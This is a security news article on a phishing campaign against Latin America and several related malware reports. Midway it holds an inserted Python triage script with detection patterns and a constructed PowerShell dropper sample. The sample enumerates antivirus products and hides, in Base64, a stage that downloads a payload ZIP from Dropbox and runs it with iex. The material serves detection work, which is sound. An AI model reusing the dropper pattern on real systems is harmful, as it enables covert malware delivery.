
A new phishing campaign is targeting Latin America, delivering malicious payloads to Windows systems.
“The phishing email contained a ZIP file attachment that, when extracted, revealed an HTML file that resulted in the download of a malicious file posing as an invoice,” said Karla Agregado, a researcher at Trustwave SpiderLabs.
The company said the email message originated from an address using the domain name “temporary[.]link” and lists Roundcube Webmail as the user agent string.
The HTML file contains a link (“facturasmex[.]cloud”) that displays an error message, “This account has been suspended”, but when accessed from an IP address located in Mexico, a CAPTCHA verification page using Cloudflare Turnstile is loaded instead.

This step paves the way for redirection to another domain where the malicious RAR file is downloaded. The RAR file comes with a PowerShell script that collects system metadata and checks the infected computer for antivirus software.
It also contains several Base64-encoded strings designed to execute a PHP script to determine the user’s country and retrieve a ZIP file from Dropbox that contains “many highly suspicious files.”
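As an added defender-side illustration (not code from Trustwave or the article), the Python triage helper below statically scans a PowerShell dropper for the behaviours described above: system-metadata and antivirus enumeration inline, plus a PHP geo-check and a Dropbox fetch hidden inside Base64-encoded strings. The sample script, the EXAMPLE hostnames and the indicator patterns are constructed assumptions, not the campaign's real artifacts.

```python
import base64
import binascii
import re

# Behaviours the article attributes to the dropper, as case-insensitive patterns.
# AntiVirusProduct (root\SecurityCenter2) is the usual WMI class for AV enumeration;
# the other patterns are assumptions about what such a script would contain.
INDICATORS = {
    "av_check": re.compile(r"AntiVirusProduct|SecurityCenter2", re.I),
    "system_metadata": re.compile(r"Get-ComputerInfo|Win32_OperatingSystem|Get-WmiObject", re.I),
    "dropbox_download": re.compile(r"dropbox\.com", re.I),
    "php_country_check": re.compile(r"\.php\b|country|geo", re.I),
}
# Long runs of Base64 alphabet characters; shorter runs are too noisy to decode.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_strings(script: str) -> list[str]:
    """Return the text of every long Base64 run that decodes as UTF-8 or UTF-16LE."""
    decoded = []
    for match in B64_RE.finditer(script):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        for encoding in ("utf-8", "utf-16-le"):  # -EncodedCommand payloads are UTF-16LE
            try:
                decoded.append(raw.decode(encoding))
                break
            except UnicodeDecodeError:
                continue
    return decoded


def triage(script: str) -> dict[str, list[str]]:
    """Map each indicator to the layers ("inline", "decoded") in which it appears."""
    layers = [("inline", script)] + [("decoded", t) for t in decode_base64_strings(script)]
    hits: dict[str, list[str]] = {}
    for name, pattern in INDICATORS.items():
        where = sorted({layer for layer, text in layers if pattern.search(text)})
        if where:
            hits[name] = where
    return hits


# Constructed sample in the shape the article describes (not the real dropper).
STAGE2 = ('$c = Invoke-RestMethod "https://EXAMPLE.invalid/geo.php"\n'
          'Invoke-WebRequest "https://www.dropbox.com/s/EXAMPLE/payload.zip" -OutFile "$env:TEMP\\p.zip"')
SAMPLE = (
    "$os = Get-WmiObject Win32_OperatingSystem\n"
    "$av = Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct\n"
    f"$s = '{base64.b64encode(STAGE2.encode()).decode()}'\n"
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))\n"
)
```

Running `triage(SAMPLE)` reports the AV and metadata checks in the inline layer and the Dropbox fetch only in the decoded layer, which is the point: the second stage is invisible to a plain string match until the Base64 is unwrapped.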
Trustwave said the campaign has similarities to past Horabot malware campaigns targeting Spanish-speaking users in Latin America.
“Understandably, from a threat actor’s perspective, phishing campaigns always try different methods to hide any malicious activity and avoid immediate detection,” Agregado said.
“Using a newly created domain and making it accessible only in a specific country is another evasion technique. Especially when the domain name behaves differently depending on the target country.”
At the same time, Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users with fake advertisements for NordVPN, leading to the distribution of a remote access trojan called SectopRAT (aka ArechClient) via a fake website (“besthord-vpn[.]com”) hosted on Dropbox.

“Malvertising continues to demonstrate how easy it is to covertly install malware under the guise of popular software downloads,” said security researcher Jérôme Segura. “Threat actors are able to quickly and easily deploy infrastructure to bypass many content filters.”
According to the SonicWall report, a fake Java Access Bridge installer was also discovered that served as a conduit for deploying the open-source XMRig cryptocurrency miner.
The cybersecurity firm said it also discovered a Golang malware that “uses multiple geo-checks and publicly available packages to take a screenshot of the system before installing a root certificate into the Windows registry for HTTPS communication with the command-and-control server.”